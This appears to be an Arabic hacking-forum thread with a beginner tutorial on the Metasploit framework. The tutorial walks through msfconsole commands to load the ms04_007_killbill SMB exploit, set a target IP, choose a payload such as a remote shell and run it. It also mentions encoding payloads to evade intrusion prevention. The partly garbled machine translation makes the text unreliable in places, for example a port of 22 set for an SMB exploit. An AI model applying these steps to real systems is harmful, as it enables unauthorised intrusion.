الوسوم:
حالة الموضوع:
مغلق
  1. Mr.B4dR

    Mr.B4dR Developer

    الأنتساب:
    ‏5 سبتمبر 2011
    المشاركات:
    40
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    يا شباب رد السلام واجب *_^
    _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-


    [​IMG]


    الشرح جهد شخصي فيمكن راح تواجه بعض الكلمات مبهمه فحاول تفهمها

    تم إنشاء مشروع M e tasploit في عام 2003 على أنها لعبة شبكة محمول باستخدام لغة البرمجة بيرل. وفي وقت لاحق ، وكان الإطار M e tasploitثم إعادة كتابة تماما في لغة البرمجة روبي. ومن أبرز لاطلاق سراح بعض من مآثر الأكثر تطورا من الناحية التقنية لنقاط الضعف الأمنية العامة. وبالإضافة إلى ذلك ، بل هو أداة قوية للباحثين الأمن خارجية للتحقيق في نقاط الضعف المحتملةفي الأنظمه . يوم 21 أكتوبر 2009 أعلن مشروع M e t asploit [1] التي تم الحصول عليها من قبل Rapid7 ، وهي شركة أمنية توفر حلول إدارة موحدة الضعف .

    وقد أدى موقف M e t asploit الصاعدة باعتبارها الإطار الفعلي التنمية ضعف في الآونة الأخيرة إلى إصدار تحذيرات ضعف البرامج التي غالبا ما تقترن من جانب طرف ثالثM e tasploitاستغلال الوحدة النمطية التي تسلط الضوء على إمكانية الاستغلال ، والمخاطر ، ومعالجة هذا الخطأ بعينهM e tasploit لغة روبي () هو بداية ليشمل أيضا أدوات التضبيب ، لاكتشاف نقاط ضعف البرامج في المقام الأول ، بدلا من مجرد الكتابة عن الخلل يستغل عامة حاليا.

    الخطوات الأساسية لاستغلال نظام باستخدام الإطار تشمل --

    1. اختيار وتكوين لاستغلال (رمز أن يدخل النظام الهدف من خلال الاستفادة من واحدة من البق بها ؛ حوالي 300 يستغل مختلفة عن ويندوز ، يونيكس / وترد لينكس وماك نظم التشغيل العاشر) ؛
    2. التحقق ما إذا كان النظام المستهدف هو عرضة للاستغلال اختيار (اختياري) ؛
    3. اختيار وتكوين حمولة (رمز التي سيتم تنفيذها على النظام الهدف عند الدخول الناجح ، على سبيل المثال قذيفة بعيدة أو خادم فنك) ؛
    4. اختيار تقنية الترميز لترميز الحمولة بحيث نظام منع الاختراق (آي بي إس) لن يلحقوا الحمولة المشفرة ؛
    5. تنفيذ استغلالها.

    هذا نمطية السماح للجمع بين أي استغلال أي حمولة هي الميزة الرئيسية للإطار : تسهل مهام المهاجمين استغلال الكتاب ، والكتاب الحمولة.

    إصدارات M e t asploit منذ v3.0 مكتوبة في لغة البرمجة روبي. ونفذ النسخة السابقة 2.7 في بيرل. وهي تدير على جميع النسخ من يونيكس (بما فيها لينوكس وماكنتوش) ، وأيضا على ويندوز. ويشمل اثنين من سطر الأوامر واجهات ، واجهة على شبكة الإنترنت واجهة المستخدم الرسومية الأصلي. والقصد من واجهة الشبكة ليتم تشغيلها من جهاز الكمبيوتر المهاجم. ويمكن تمديد الإطار الخارجية لاستخدام إضافات في لغات متعددة.

    ملاحظه : بعض الأوامر يكتفي بكتابة الحرفين الاوله أو الثلاثه من الكلمه والضغط على زر Tab وهو راح يكمل الكلمه

    نبدأ بفتح سطر الأوامر و من ثم الذهاب للمجلد الموجود به مشروع M e t asploit في لينكس [​IMG]

    بعد ذلك نقوم بتشغيل سطر أوامر مشروع M e t asploit بتنفيذ الأمر:

    كود PHP:
    ./msfconsole
    أول ما يبدأ سطر أوامرM e t asploit يعطينا معلومات عن حالة المشروع
    =[

    كود PHP:
    m e t asploit v3.4.1-dev [core:3.4 api:1.0]
    + -- --=[ 
    564 exploits 274 auxiliary
    + -- --=[ 209 payloads 26 encoders 8 nops
           
    =[ svn r9579 updated today (2010.06.22)
    اللي يهمنا الآن هذي الاوامر

    كود PHP:
    1 ـ show exploits --->  لإستعراض الثغرات 
    2 ـ  info exploit 
    --->  لإستعراض معلومات الثغره وش نوع الثغره وعلى أي نظام ؟
    3 ـ 
    use exploit   --->  لبدأ إستغلا الثغره ؟ 
    4 ـ  show options 
    --->  لإظهار خيارات الثغره ؟ 
    نبدأ بالصور للإيضاح بالاوامر

    كود PHP:
    1 ـ show exploits --->  لإستعراض الثغرات 

    كود PHP:
    2 ـ  info exploit --->  لإستعراض معلومات الثغره وش نوع الثغره وعلى أي نظام ؟
    كود PHP:
    exploit(ms04_007_killbill) > info
    3 ـ use exploit ---> لبدأ إستغلا الثغره ؟
    بالأمر :

    كود PHP:
    use windows/smb/ms04_007_killbill
    4 ـ show options ---> لإظهار خيارات الثغره ؟
    بالامر :

    كود PHP:
    exploit(ms04_007_killbill) > show options

    بعدها تطلع ملعومات اوضح بعض المعلومات

    كود PHP:
    PROTO  smb              
    RHOST    هذا الخيار يقول أضف أي بي الجهاز المستهدف               
    RPORT  445   البورت المستخدم في الثغره أو الولج للجهاز المستهدف  
    نبدأ بالإستغلا ويكون البدأ بهذا الامر

    كود PHP:
    exploit(ms04_007_killbill) >set RHOST 192.168.1.68---->أي بي الجهاز المستهدف

    البورت المستخدم الامر

    كود PHP:
    exploit(ms04_007_killbill) >set rport 22
    بعدها تحديد طريقة إستغلا الثغره بهذا الامر

    كود PHP:
    show payloads
    بعدها الإستغلا بهذا الامر

    كود PHP:
    exploit
    إذا كان جميع الخطوات صحيحه سيتم إستغلال الثغره والدخول على حسب الثغره أو النظام

    هذا شرح مبسط لمشروع الميتا بدأ بالتعريف عنه ومتا ظهر نهاية بالإستغلال

    أتمنى اني وفقت في الشرح البسيط للمشروع أول بالأصح شرح لدخول عالم الميتا ( إنتظرونا مع شورحات أخرى )
     
  2. so9or

    so9or Developer

    الأنتساب:
    ‏4 أكتوبر 2011
    المشاركات:
    40
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    السعودية
    [b][b]تسلم على الشرح أخي ألكريم ألله يعطيك ألف عافيه[/b][/b]
     
  3. HaKoReY

    HaKoReY Developer

    الأنتساب:
    ‏14 أكتوبر 2011
    المشاركات:
    17
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: مشروع M e tasploit

    تسلم ايديك يا باشا مجهود ملحوظ اعانك الله على الخير وانشار وافادة الاخرين دائما
    تقبل مرورى
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة